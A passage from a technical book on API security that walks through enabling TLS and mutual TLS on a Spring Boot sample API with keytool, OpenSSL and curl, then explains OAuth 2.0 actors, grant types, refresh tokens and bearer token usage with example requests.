"1.8.0_121" Java(TM) SE Runtime Environment (build 1.8.0_121- b13) Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode) \>mvn -version Apache Maven 3.5.0 (ff8f5e7444045639af65f6095c62210b5713f426; 2017-04- 03T12:39:06-07:00) Maven home: /usr/local/Cellar/maven/3.5.0/libexec Java version: 1.8.0_121, vendor: Oracle Corporation Java home: /Library/Java/JavaVirtualMachines/jdk1.8.0_121.jdk/Contents/ Home/jre Default locale: en_US, platform encoding: UTF-8 OS name: "mac os x", version: "10.12.6", arch: "x86_64", family: "mac All the samples used in this book are available in the https://github.com/ apisecurity/samples.git git repository. Use the following git command to clone it. All the samples related to this chapter are inside the directory ch03. \> git clone https://github.com/apisecurity/samples.git \> cd samples/ch03 To anyone who loves Maven, the best way to get started with a Spring Boot project would be with a Maven archetype. Unfortunately, it is no more supported. One option we have is to create a template project via https://start.spring.io/ –which is known as the Spring Initializer. There you can pick which type of project you want to create, project dependencies, give a name, and download a maven project as a zip file. The other option is to use the Spring Tool Suite (STS).2 It’s an IDE (integrated development 2 https://spring.io/tools Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 71 environment) built on top of the Eclipse platform, with many useful plugins to create Spring projects. However, in this book, we provide you all the fully coded samples in the preceding git repository. Note if you find any issues in building or running the samples given in this book, please refer to the reaDMe file under the corresponding chapter in the git repository: https://github.com/apisecurity/samples.git. we will update the samples and the corresponding reaDMe files in the git repository, to reflect any changes happening, related to the tools, libraries, and frameworks used in this book. Deploying Order API This is the simplest API ever. You can find the code inside the directory ch03/sample01. To build the project with Maven, use the following command: \> cd sample01 \> mvn clean install Before we delve deep into the code, let’s have a look at some of the notable Maven dependencies and plugins added into ch03/sample01/pom.xml. Spring Boot comes with different starter dependencies to integrate with different Spring modules. The spring-boot-starter-web dependency brings in Tomcat and Spring MVC and, does all the wiring between the components, making the developer’s work to a minimum. The spring-boot-starter-actuator dependency helps you monitor and manage your application. <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-actuator</artifactId> </dependency> Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 72 In the pom.xml file, we also have the spring-boot-maven-plugin plugin, which lets you start the Spring Boot API from Maven itself. <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-maven-plugin</artifactId> </plugin> Now let’s have a look at the checkOrderStatus method in the class file src/ main/java/com/apress/ch03/sample01/service/OrderProcessing.java. This method accepts an order id and returns back the status of the order. There are three notable annotations used in the following code. The @RestController is a class-level annotation that marks the corresponding class as a REST endpoint, which accepts and produces JSON payloads. The @RequestMapping annotation can be defined both at the class level and the method level. The value attribute at the class-level annotation defines the path under which the corresponding endpoint is registered. The same at the method level appends to the class-level path. Anything defined within curly braces is a placeholder for any variable value in the path. For example, a GET request on /order/101 and /order/102 (where 101 and 102 are the order ids), both hit the method checkOrderStatus. In fact, the value of the value attribute is a URI template.3 The annotation @PathVariable extracts the provided variable from the URI template defined under the value attribute of the @RequestMapping annotation and binds it to the variable defined in the method signature. @RestController @RequestMapping(value = "/order") public class OrderProcessing { @RequestMapping(value = "/{id}", method = RequestMethod.GET) public String checkOrderStatus(@PathVariable("id") String orderId) { return ResponseEntity.ok("{'status' : 'shipped'}"); } } 3 https://tools.ietf.org/html/rfc6570 Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 73 There is another important class file at src/main/java/com/apress/ch03/sample01/ OrderProcessingApp.java worth having a look at. This is the class which spins up our API in its own application server, in this case the embedded Tomcat. By default the API starts on port 8080, and you can change the port by adding, say, for example, server.port=9000 to the sample01/src/main/resources/application.properties file. This will set the server port to 9000. The following shows the code snippet from OrderProcessingApp class, which spins up our API. The @SpringBootApplication annotation, which is defined at the class level, is being used as a shortcut for four other annotations defined in Spring: @Configuration, @EnableAutoConfiguration, @EnableWebMvc, and @ComponentScan. @SpringBootApplication public class OrderProcessingApp { public static void main(String[] args) { SpringApplication.run(OrderProcessingApp.class, args); } } Now, let’s see how to run our API and talk to it with a cURL client. The following command executed from ch03/sample01 directory shows how to start our Spring Boot application with Maven. \> mvn spring-boot:run To test the API with a cURL client, use the following command from a different command console. It will print the output as shown in the following, after the initial command. \> curl http://localhost:8080/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type":"V ISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 74 Securing Order API with Transport Layer Security (TLS) To enable Transport Layer Security (TLS), first we need to create a public/private key pair. The following command uses keytool that comes with the default Java distribution to generate a key pair and stores it in keystore.jks file. This file is also known as a keystore, and it can be in different formats. Two most popular formats are Java KeyStore (JKS) and PKCS#12. JKS is specific to Java, while PKCS#12 is a standard, which belongs to the family of standards defined under Public Key Cryptography Standards (PKCS). In the following command, we specify the keystore type with the storetype argument, which is set to JKS. \> keytool -genkey -alias spring -keyalg RSA -keysize 4096 -validity 3650 -dname "CN=foo,OU=bar,O=zee,L=sjc,S=ca,C=us" -keypass springboot -keystore keystore.jks -storeType jks -storepass springboot The alias argument in the preceding command specifies how to identify the generated keys stored in the keystore. There can be multiple keys stored in a given keystore, and the value of the corresponding alias must be unique. Here we use spring as the alias. The validity argument specifies that the generated keys are only valid for 10 years or 3650 days. The keysize and keystore arguments specify the length of the generated key and the name of the keystore, where the keys are stored. The genkey is the option, which instructs the keytool to generate new keys; instead of genkey, you can also use genkeypair option. Once the preceding command is executed, it will create a keystore file called keystore.jks, which is protected with the password springboot. The certificate created in this example is known as a self-signed certificate. In other words, there is no external certificate authority (CA). Typically, in a production deployment, either you will use a public certificate authority or an enterprise-level certificate authority to sign the public certificate, so any client, who trusts the certificate authority, can verify it. If you are using certificates to secure service-to-service communications in a microservices deployment or for an internal API deployment, then you need not worry about having a public certificate authority; you can have your own certificate authority. But for APIs, which you expose to external client applications, you would need to get your certificates signed by a public certificate authority. To enable TLS for the Spring Boot API, copy the keystore file (keystore.jks), which we created earlier, to the home directory of the sample (e.g., ch03/sample01/) and add Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 75 the following to the sample01/src/main/resources/application.properties file. The samples that you download from the samples git repository already have these values (and you only need to uncomment them), and we are using springboot as the password for both the keystore and the private key. server.ssl.key-store: keystore.jks server.ssl.key-store-password: springboot server.ssl.keyAlias: spring To validate that everything works fine, use the following command from ch03/ sample01/ directory to spin up the Order API and notice the line which prints the HTTPS port. \> mvn spring-boot:run Tomcat started on port(s): 8080 (https) with context path " To test the API with a cURL client, use the following command from a different command console. It will print the output as shown in the following, after the initial command. Instead of HTTP, we are using HTTPS here. \> curl –k https://localhost:8080/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type":"V ISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} We used the -k option in the preceding cURL command. Since we have a self-signed (untrusted) certificate to secure our HTTPS endpoint, we need to pass the –k parameter to advise cURL to ignore the trust validation. In a production deployment with proper certificate authority–signed certificates, you do not need to do that. Also, if you have a self- signed certificate, you can still avoid using –k, by pointing cURL to the corresponding public certificate. \> curl --cacert ca.crt https://localhost:8080/order/11 You can use the following keytool command from ch03/sample01/ to export the public certificate of the Order API to ca.crt file in PEM (with the -rfc argument) format. \> keytool -export -file ca.crt -alias spring –rfc -keystore keystore.jks -storePass springboot Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 76 The preceding curl command with the ca.crt will result in the following error. It complains that the common name in the public certificate of the Order API, which is foo, does not match with the hostname (localhost) in the cURL command. curl: (51) SSL: certificate subject name 'foo' does not match target host name 'localhost' Ideally in a production deployment when you create a certificate, its common name should match the hostname. In this case, since we do not have a Domain Name Service (DNS) entry for the foo hostname, you can use the following workaround, with cURL. \> curl --cacert ca.crt https://foo:8080/order/11 --resolve foo:8080:127.0.0.1 Protecting Order API with Mutual TLS In this section, we’ll see how to enable TLS mutual authentication between the Order API and the cURL client. In most of the cases, TLS mutual authentication is used to enable system-to-system authentication. First make sure that we have the keystore at sample01/ keystore.jks, and then to enable TLS mutual authentication, uncomment the following property in the sample01/src/main/resources/application.properties file. server.ssl.client-auth:need Now we can test the flow by invoking the Order API using cURL. First, use the following command from ch03/sample01/ directory to spin up the Order API and notice the line which prints the HTTPS port. \> mvn spring-boot:run Tomcat started on port(s): 8080 (https) with context path '' To test the API with a cURL client, use the following command from a different command console. \> curl –k https://localhost:8080/order/11 Since we have protected the API with TLS mutual authentication, the preceding command will result in the following error message, which means the API (or the server) has refused to connect with the cURL client, because it didn’t present a valid client certificate. Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 77 curl: (35) error:1401E412:SSL routines:CONNECT_CR_FINISHED:sslv3 alert bad certificate To fix this, we need to create a key pair (a public key and a private key) for the cURL client and configure Order API to trust the public key. Then we can use the key pair we generated along with the cURL command to access the API, which is protected with mutual TLS. To generate a private key and a public key for the cURL client, we use the following OpenSSL command. OpenSSL is a commercial-grade toolkit and cryptographic library for TLS and available for multiple platforms. You can download and set up the distribution that fits your platform from www.openssl.org/source. If not, the easiest way is to use an OpenSSL Docker image. In the next section, we discuss how to run OpenSSL as a Docker container. \> openssl genrsa -out privkey.pem 4096 Now, to generate a self-signed certificate, corresponding to the preceding private key (privkey.pem), use the following OpenSSL command. \> openssl req -key privkey.pem -new -x509 -sha256 -nodes -out client.crt -subj "/C=us/ST=ca/L=sjc/O=zee/OU=bar/CN=client" Let’s take down the Order API, if it is still running, and import the public certificate (client.crt) we created in the preceding step to sample01/keystore.jks, using the following command. \> keytool -import -file client.crt -alias client -keystore keystore.jks -storepass springboot Now we can test the flow by invoking the Order API using cURL. First, use the following command from ch03/sample01/ directory to spin up the Order API. \> mvn spring-boot:run Tomcat started on port(s): 8080 (https) with context path '' To test the API with a cURL client, use the following command from a different command console. \> curl -k --key privkey.pem --cert client.crt https://localhost:8080/ order/11 Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 78 In case we use a key pair, which is not known to the Order API, or in other words not imported into the sample01/keystore.jks file, you will see the following error, when you execute the preceding cURL command. curl: (35) error:1401E416:SSL routines:CONNECT_CR_FINISHED:sslv3 alert certificate unknown Running OpenSSL on Docker In the last few years, Docker revolutionized the way we distribute software. Docker provides a containerized environment to run software in self-contained manner. A complete overview of Docker is out of the scope of this book—and if you are interested in learning more, we recommend you check out the book Docker in Action (Manning Publications, 2019) by Jeff Nickoloff and Stephen Kuenzli. Setting up Docker in your local machine is quite straightforward, following the steps in Docker documentation available at https://docs.docker.com/install/. Once you get Docker installed, run the following command to verify the installation, and it will show the version of Docker engine client and server. \> docker version To start OpenSSL as a Docker container, use the following command from the ch03/ sample01 directory. \> docker run -it -v $(pwd):/export prabath/openssl # When you run the preceding command for the first time, it will take a couple of minutes to execute and ends with a command prompt, where you can execute your OpenSSL commands to create the keys, which we used toward the end of the previous sections. The preceding docker run command starts OpenSSL in a Docker container, with a volume mount, which maps ch03/sample01 (or the current directory, which is indicated by $(pwd) in the preceding command) directory from the host file system to the /export directory of the container file system. This volume mount helps you to share part of the host file system with the container file system. When the OpenSSL container generates certificates, those are written to the /export directory of the container file system. Since Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 79 we have a volume mount, everything inside the /export directory of the container file system is also accessible from the ch03/sample01 directory of the host file system. To generate a private key and a public key for the cURL client, we use the following OpenSSL command. # openssl genrsa -out /export/privkey.pem 4096 Now, to generate a self-signed certificate, corresponding to the preceding private key (privkey.pem), use the following OpenSSL command. # openssl req -key /export/privkey.pem -new -x509 -sha256 -nodes -out client.crt -subj "/C=us/ST=ca/L=sjc/O=zee/OU=bar/CN=client" Summary • Transport Layer Security (TLS) is fundamental in securing any API. • Securing APIs with TLS is the most common form of protection we see in any API deployment. • TLS protects data in transit for confidentiality and integrity, and mutual TLS (mTLS) protects your APIs from intruders by enforcing client authentication. • OpenSSL is a commercial-grade toolkit and cryptographic library for TLS and available for multiple platforms. Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 81 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_4 CHAPTER 4 OAuth 2.0 Fundamentals OAuth 2.0 is a major breakthrough in identity delegation. It has its roots in OAuth 1.0 (see Appendix B), but OAuth Web Resource Authorization Profiles (see Appendix B) primarily influenced it. The main difference between OAuth 1.0 and 2.0 is that OAuth 1.0 is a standard protocol for identity delegation, whereas OAuth 2.0 is a highly extensible authorization framework. OAuth 2.0 is already the de facto standard for securing APIs and is widely used by Facebook, Google, LinkedIn, Microsoft (MSN, Live), PayPal, Instagram, Foursquare, GitHub, Yammer, Meetup, and many more. There is one popular exception: Twitter still uses OAuth 1.0. Understanding OAuth 2.0 OAuth 2.0 primarily solves the access delegation problem. Let’s say you want a third- party application to read your status messages on your Facebook wall. In other words, you want to delegate the third-party application the access to your Facebook wall. One way to do that is by sharing your Facebook credentials with the third-party application, so it can directly access your Facebook wall. This is called access delegation by credential sharing. Even though this solves the access delegation problem, once you share your Facebook credentials with the third-party application, it can use your credentials to do anything it wants, which in turns creates more problems! OAuth 2.0 solves this problem in a way you do not need to share your credentials with third-party applications, but only share a time-bound temporary token that is only good enough for a well-defined 82 purpose. Figure 4-1 shows at a high level how access delegation works with OAuth 2.0, and the following explains each step in Figure 4-1: 1. The user visits the third-party web application and wants to let the web application publish messages to his/her Facebook wall. To do that, the web application needs a token from Facebook, and to get the token, it redirects the user to Facebook. 2. Facebook prompts the user to authenticate (if not authenticated already) and requests the consent from the user to give permissions to the third-party web application to publish messages to his/her Facebook wall. 3. User authenticates and provides his/her consent to Facebook, so that Facebook can share a token with the third-party web application. This token is only good enough to publish messages to the Facebook wall for a limited period and cannot do anything else. For example, the third-party web application cannot send friend requests, delete status messages, upload photos, and so on with the token. 4. The third-party web application gets a token from Facebook. To explain what exactly happens in this step, first we need to understand how OAuth 2.0 grant types work, and we discuss that later in the chapter. 5. The third-party web application accesses the Facebook API with the token provided to it by Facebook in step 4. Facebook API makes sure only requests that come along with a valid token can access it. Then again later in the chapter, we will explain in detail what happens in this step. Chapter 4 Oauth 2.0 Fundamentals 83 OAuth 2.0 Actors OAuth 2.0 introduces four actors in a typical OAuth flow. The following explains the role of each of them with respect to Figure 4-1: 1. Resource owner: One who owns the resources. In our example earlier, the third- party web application wants to access the Facebook wall of a Facebook user via the Facebook API and publish messages on behalf of him/her. In that case, the Facebook user who owns the Facebook wall is the resource owner. 2. Resource server: This is the place which hosts protected resources. In the preceding scenario, the server that hosts the Facebook API is the resource server, where Facebook API is the resource. 3. Client: This is the application which wants to access a resource on behalf of the resource owner. In the preceding use case, the third- party web application is the client. Figure 4-1. OAuth 2.0 solves the access delegation problem by issuing a temporary time-bound token to a third-party web application that is only good enough for a well- defined purpose Chapter 4 Oauth 2.0 Fundamentals 84 4. Authorization server: This is the entity which acts as a security token service to issue OAuth 2.0 access tokens to client applications. In the preceding use case, Facebook itself acts as the authorization server. Grant Types A grant type in OAuth 2.0 defines how a client can obtain an authorization grant from a resource owner to access a resource on his/her behalf. The origin of the word grant comes from the French word granter which carries the meaning consent to support. In other words, a grant type defines a well-defined process to get the consent from the resource owner to access a resource on his/her behalf for a well-defined purpose. In OAuth 2.0, this well-defined purpose is also called scope. Also you can interpret scope as a permission, or in other words, scope defines what actions the client application can do on a given resource. In Figure 4-1, the token issued from the Facebook authorization server is bound to a scope, where the client application can only use the token to post messages to the corresponding user’s Facebook wall. The grant types in OAuth 2.0 are very similar to the OAuth profiles in WRAP (see Appendix B). The OAuth 2.0 core specification introduces four core grant types: the authorization code grant type, the implicit grant type, the resource owner password credentials grant type, and the client credentials grant type. Table 4-1 shows how OAuth 2.0 grant types match with WRAP profiles. Table 4-1. OAuth 2.0 Grant Types vs. OAuth WRAP Profiles OAuth 2.0 OAuth WRAP authorization code grant type Web app profile/rich app profile Implicit grant type – resource owner password credentials grant type username and password profile Client credentials grant type Client account and password profile Chapter 4 Oauth 2.0 Fundamentals 85 Authorization Code Grant Type The authorization code grant type in OAuth 2.0 is very similar to the Web App Profile in WRAP. It’s mostly recommended for applications—either web applications or native mobile applications—that have the capability to spin up a web browser (see Figure 4- 2). The resource owner who visits the client application initiates the authorization code grant type. The client application, which must be a registered application at the authorization server, as shown in step 1 in Figure 4-2, redirects the resource owner to the authorization server to get the approval. The following shows an HTTP request the client application generates while redirecting the user to the authorize endpoint of the authorization server: https://authz.example.com/oauth2/authorize? response_type=code& client_id=0rhQErXIX49svVYoXJGt0DWBuFca& redirect_uri=https%3A%2F%2Fmycallback The authorize endpoint is a well-known, published endpoint of an OAuth 2.0 authorization server. The value of response_type parameter must be code. This indicates to the authorization server that the request is for an authorization code (under the authorization code grant type). client_id is an identifier for the client application. Once the client application is registered with the authorization server, the client gets a client_id and a client_secret. During the client registration phase, the client application must provide a URL under its control as the redirect_uri, and in the initial request, the value of the redirect_uri parameter should match with the one registered with the authorization server. We also call the redirect_uri the callback URL. The URL-encoded value of the callback URL is added to the request as the redirect_uri parameter. In addition to these parameters, a client application can also include the scope parameter. The value of the scope parameter is shown to the resource owner on the approval screen: it indicates to the authorization server the level of access the client needs on the target resource/API. Chapter 4 Oauth 2.0 Fundamentals 86 In step 5 in Figure 4-2, the authorization server returns the requested code to the registered callback URL (also known as redirect_uri) of the client application. This code is called the authorization code. Each authorization code should have a lifetime. A lifetime longer than 1 minute isn’t recommended: https://callback.example.com/?code=9142d4cad58c66d0a5edfad8952192 The value of the authorization code is delivered to the client application via an HTTP redirect and is visible to the resource owner. In the next step (step 6), the client must exchange the authorization code for an OAuth access token by talking to the OAuth token endpoint exposed by the authorization server. Note the ultimate goal of any Oauth 2.0 grant type is to provide a token (which is known as access token) to the client application. the client application can use this token to access a resource. an access token is bound to the resource owner, client application, and one or more scopes. Given an access token, the authorization server knows who the corresponding resource owner and client application and also what the attached scopes are. Figure 4-2. Authorization code grant type Chapter 4 Oauth 2.0 Fundamentals 87 The token endpoint in most of the cases is a secured endpoint. The client application can generate the token request along with the corresponding client_id (0rhQErXIX49s vVYoXJGt0DWBuFca) and the client_secret (eYOFkL756W8usQaVNgCNkz9C2D0a), which will go in the HTTP Authorization header. In most of the cases, the token endpoint is secured with HTTP Basic authentication, but it is not a must. For stronger security, one may use mutual TLS as well, and if you are using the authorization code grant type from a single-page app or a mobile app, then you may not use any credentials at all. The following shows a sample request (step 6) to the token endpoint. The value of the grant_type parameter there must be the authorization_code, and the value of the code should be the one returned from the previous step (step 5). If the client application sent a value in the redirect_uri parameter in the previous request (step 1), then it must include the same value in the token request as well. In case the client application does not authenticate to the token endpoint, you need to send the corresponding client_id as a parameter in the HTTP body: Note the authorization code returned from the authorization server acts as an intermediate code. this code is used to map the end user or resource owner to the Oauth client. the Oauth client may authenticate itself to the token endpoint of the authorization server. the authorization server should check whether the code is issued to the authenticated Oauth client prior to exchanging it for an access token. \> curl -v –k -X POST --basic -u 0rhQErXIX49svVYoXJGt0DWBuFca:eYOFkL756W8usQaVNgCNkz9C2D0a -H "Content-Type:application/x-www-form-urlencoded;charset=UTF-8" -d "grant_type=authorization_code& code=9142d4cad58c66d0a5edfad8952192& redirect_uri=https://mycallback" https://authz.example.com/oauth2/token Note the authorization code should be used only once by the client. If the authorization server detects that it’s been used more than once, it must revoke all the tokens issued for that particular authorization code. Chapter 4 Oauth 2.0 Fundamentals 88 The preceding cURL command returns the following response from the authorization server (step 7). The token_type parameter in the response indicates the type of the token. (The section “OAuth 2.0 Token Types” talks more about token types.) In addition to the access token, the authorization server also returns a refresh token, which is optional. The refresh token can be used by the client application to obtain a new access token before the refresh token expires. The expires_in parameter indicates the lifetime of the access token in seconds. { "token_type":"bearer", "expires_in":3600, "refresh_token":"22b157546b26c2d6c0165c4ef6b3f736", "access_token":"cac93e1d29e45bf6d84073dbfb460" } Note each refresh token has its own lifetime. Compared to the lifetime of the access token, the refresh token’s is longer: the lifetime of an access token is in minutes, whereas the lifetime of a refresh token is in days. Implicit Grant Type The implicit grant type to acquire an access token is mostly used by JavaScript clients running in the web browser (see Figure 4-3). Even for JavaScript clients now, we do not recommend using implicit grant type, rather use authorization code grant type with no client authentication. This is mostly due to the inherent security issues in the implicit grant type, which we discuss in Chapter 14. The following discussion on implicit grant type will help you understand how it works, but never use it in a production deployment. Chapter 4 Oauth 2.0 Fundamentals 89 Unlike the authorization code grant type, the implicit grant type doesn’t have any equivalent profiles in OAuth WRAP. The JavaScript client initiates the implicit grant flow by redirecting the user to the authorization server. The response_type parameter in the request indicates to the authorization server that the client expects a token, not a code. The implicit grant type doesn’t require the authorization server to authenticate the JavaScript client; it only has to send the client_id in the request. This is for logging and auditing purposes and also to find out the corresponding redirect_uri. The redirect_uri in the request is optional; if it’s present, it must match what is provided at the client registration: https://authz.example.com/oauth2/authorize? response_type=token& client_id=0rhQErXIX49svVYoXJGt0DWBuFca& redirect_uri=https%3A%2F%2Fmycallback This returns the following response. The implicit grant type sends the access token as a URI fragment and doesn’t provide any refreshing mechanism: https://callback.example.com/#access_token=cac93e1d29e45bf6d84073dbfb460&ex pires_in=3600 Unlike the authorization code grant type, the implicit grant type client receives the access token in the response to the grant request. When we have something in the URI fragment of a URL, the browser never sends it to the back end. It only stays on the browser. So when authorization server sends a redirect to the callback URL of the client Figure 4-3. Implicit grant type Chapter 4 Oauth 2.0 Fundamentals 90 application, the request first comes to the browser, and the browser does an HTTP GET to the web server that hosts the client application. But in that HTTP GET, you will not find the URI fragment, and the web server will never see it. To process the access token that comes in the URI fragment, as a response to HTTP GET from the browser, the web server of the client application will return back an HTML page with a JavaScript, which knows how to extract the access_token from the URI fragment, which still remains in the browser address bar. In general this is how single-page applications work. Note the authorization server must treat the authorization code, access token, refresh token, and client secret key as sensitive data. they should never be sent over http—the authorization server must use transport layer security (tls). these tokens should be stored securely, possibly by encrypting or hashing them. Resource Owner Password Credentials Grant Type Under the resource owner password credentials grant type, the resource owner must trust the client application. This is equivalent to the Username and Password Profile in OAuth WRAP. The resource owner has to give his/her credentials directly to the client application (see Figure 4-4). The following cURL command talks to the token endpoint of the authorization server, passing the resource owner’s username and password as parameters. In addition, Figure 4-4. Resource owner password credentials grant type Chapter 4 Oauth 2.0 Fundamentals 91 the client application proves its identity. In most of the cases, the token endpoint is secured with HTTP Basic authentication (but not a must), and the client application passes its client_id (0rhQErXIX49svVYoXJGt0DWBuFca) and client_secret (eYOFkL756W8usQaVNgCNkz9C2D0a) in the HTTP Authorization header. The value of the grant_type parameter must be set to password: \> curl -v -k -X POST --basic -u 0rhQErXIX49svVYoXJGt0DWBuFca:eYOFkL756W8usQaVNgCNkz9C2D0a -H "Content-Type:application/x-www-form-urlencoded;charset=UTF-8" -d "grant_type=password& username=admin&password=admin" https://authz.example.com/oauth2/token This returns the following response, which includes an access token along with a refresh token: { "token_type":"bearer", "expires_in":685," "refresh_token":"22b157546b26c2d6c0165c4ef6b3f736", "access_token":"cac93e1d29e45bf6d84073dbfb460" } Note If using the authorization code grant type is an option, it should be used over the resource owner password credentials grant type. the resource owner password credentials grant type was introduced to aid migration from http Basic authentication and digest authentication to Oauth 2.0. Client Credentials Grant Type The client credentials grant type is equivalent to the Client Account and Password Profile in OAuth WRAP and to two-legged OAuth in OAuth 1.0 (see Appendix B). With this grant type, the client itself becomes the resource owner (see Figure 4-5). The following cURL command talks to the token endpoint of the authorization server, passing the client application’s client_id (0rhQErXIX49svVYoXJGt0DWBuFca) and client_secret (eYOFkL756W8usQaVNgCNkz9C2D0a). Chapter 4 Oauth 2.0 Fundamentals 92 \> curl –v –k -X POST --basic -u 0rhQErXIX49svVYoXJGt0DWBuFca:eYOFkL756W8usQaVNgCNkz9C2D0a -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -d "grant_type=client_credentials" https://authz.example.com/oauth2/token This returns the following response, which includes an access token. Unlike the resource owner password credentials grant type, the client credentials grant type doesn’t return a refresh token: { "token_type":"bearer", "expires_in":3600, "access_token":"4c9a9ae7463ff9bb93ae7f169bd6a" } This client credential grant type is mostly used for system-to-system interactions with no end user. For example, a web application needs to access an OAuth secured API to get some metadata. Refresh Grant Type Although it’s not the case with the implicit grant type and the client credentials grant type, with the other two grant types, the OAuth access token comes with a refresh token. This refresh token can be used to extend the validity of the access token without the involvement of the resource owner. The following cURL command shows how to get a new access token from the refresh token: Figure 4-5. Client credentials grant type Chapter 4 Oauth 2.0 Fundamentals 93 \> curl -v -X POST --basic -u 0rhQErXIX49svVYoXJGt0DWBuFca:eYOFkL756W8usQaVNgCNkz9C2D0a -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=refresh_token& refresh_token=22b157546b26c2d6c0165c4ef6b3f736" https://authz.example.com/oauth2/token This returns the following response: { "token_type":"bearer", "expires_in":3600, "refresh_token":"9ecc381836fa5e3baf5a9e86081", "access_token":"b574d1ba554c26148f5fca3cceb05e2" } Note the refresh token has a much longer lifetime than the access token. If the lifetime of the refresh token expires, then the client must initiate the Oauth token flow from the start and get a new access token and refresh token. the authorization server also has the option to return a new refresh token each time the client refreshes the access token. In such cases, the client has to discard the previously obtained refresh token and begin using the new one. How to Pick the Right Grant Type? As we discussed at the very beginning of the chapter, OAuth 2.0 is an authorization framework. The nature of a framework is to provide multiple options, and it’s up to the application developers to pick the best out of those options, based on their use cases. OAuth can be used with any kind of application. It can be a web application, single-page application, desktop application, or a native mobile application. To pick the right grant type for those applications, first we need to think how the client application is going to invoke the OAuth secured API: whether it is going to access the API by itself or on behalf of an end user. If the application wants to access the API just being itself, then we should use client credentials grant type and, if not, should use authorization code grant type. Both the implicit and password grant types are now obsolete. Chapter 4 Oauth 2.0 Fundamentals 94 OAuth 2.0 Token Types Neither OAuth 1.0 nor WRAP could support custom token types. OAuth 1.0 always used signature-based tokens, and OAuth WRAP always used bearer tokens over TLS. OAuth 2.0 isn’t coupled into any token type. In OAuth 2.0, you can introduce your own token type if needed. Regardless of the token_type returned in the OAuth token response from the authorization server, the client must understand it before using it. Based on the token_ type, the authorization server can add additional attributes/parameters to the response. OAuth 2.0 has two main token profiles: OAuth 2.0 Bearer Token Profile and OAuth 2.0 MAC Token Profile. The most popular OAuth token profile is Bearer; almost all OAuth 2.0 deployments today are based on the OAuth 2.0 Bearer Token Profile. The next section talks about the Bearer Token Profile in detail, and Appendix G discusses the MAC Token Profile. OAuth 2.0 Bearer Token Profile The OAuth 2.0 Bearer Token Profile was influenced by OAuth WRAP, which only supported bearer tokens. As its name implies, anyone who bears the token can use it—don’t lose it! Bearer tokens must always be used over Transport Layer Security (TLS) to avoid losing them in transit. Once the bearer access token is obtained from the authorization server, the client can use it in three ways to talk to the resource server. These three ways are defined in the RFC 6750. The most popular way is to include the access token in the HTTP Authorization header: Note an Oauth 2.0 bearer token can be a reference token or self-contained token. a reference token is an arbitrary string. an attacker can carry out a brute- force attack to guess the token. the authorization server must pick the right length and use other possible measures to prevent brute forcing. a self-contained access token is a JsOn Web token (JWt), which we discuss in Chapter 7. When the resource server gets an access token, which is a reference token, then to validate the token, it has to talk to the authorization server (or the token issuer). When the access token is a JWt, the resource server can validate the token by itself, by verifying the signature of the JWt. Chapter 4 Oauth 2.0 Fundamentals 95 GET /resource HTTP/1.1 Host: rs.example.com Authorization: Bearer JGjhgyuyibGGjgjkjdlsjkjdsd The access token can also be included as a query parameter. This approach is mostly used by the client applications developed in JavaScript: GET /resource?access_token=JGjhgyuyibGGjgjkjdlsjkjdsd Host: rs.example.com Note When the value of the Oauth access token is sent as a query parameter, the name of the parameter must be access_token. Both Facebook and Google use the correct parameter name, but linkedIn uses oauth2_access_token and salesforce uses oauth_token. It’s also possible to send the access token as a form-encoded body parameter. An authorization server supporting the Bearer Token Profile should be able to handle any of these patterns: POST /resource HTTP/1.1 Host: server.example.com Content-Type: application/x-www-form-urlencoded access_token=JGjhgyuyibGGjgjkjdlsjkjdsd Note the value of the Oauth bearer token is only meaningful to the authorization server. the client application should not try to interpret what it says. to make the processing logic efficient, the authorization server may include some meaningful but nonconfidential data in the access token. For example, if the authorization server supports multiple domains with multitenancy, it may include the tenant domain in the access token and then base64-encode (see appendix e) it or simply use a JsOn Web token (JWt). Chapter 4 Oauth 2.0 Fundamentals 96 OAuth 2.0 Client Types OAuth 2.0 identifies two types of clients: confidential clients and public clients. Confidential clients are capable of protecting their own credentials (the client key and the client secret), whereas public clients can’t. The OAuth 2.0 specification is built around three types of client profiles: web applications, user agent–based applications, and native applications. Web applications are considered to be confidential clients, running on a web server: end users or resource owners access such applications via a web browser. User agent–based applications are considered to be public clients: they download the code from a web server and run it on the user agent, such as JavaScript running in the browser. These clients are incapable of protecting their credentials—the end user can see anything in the JavaScript. Native applications are also considered as public clients: these clients are under the control of the end user, and any confidential data stored in those applications can be extracted out. Android and iOS native applications are a couple of examples. Note all four grant types defined in the Oauth 2.0 core specification require the client to preregister with the authorization server, and in return it gets a client identifier. under the implicit grant type, the client doesn’t get a client secret. at the same time, even under other grant types, it’s an option whether to use the client secret or not. Table 4-2 lists the key differences between OAuth 1.0 and OAuth 2.0 Bearer Token Profile. Table 4-2. OAuth 1.0 vs. OAuth 2.0 OAuth 1.0 OAuth 2.0 Bearer Token Profile an access delegation protocol an authorization framework for access delegation signature based: hmaC-sha256/rsa- sha256 nonsignature-based, Bearer token profile less extensibility highly extensible via grant types and token types less developer-friendly tls required only during the initial handshake secret key never passed on the wire more developer-friendly Bearer token 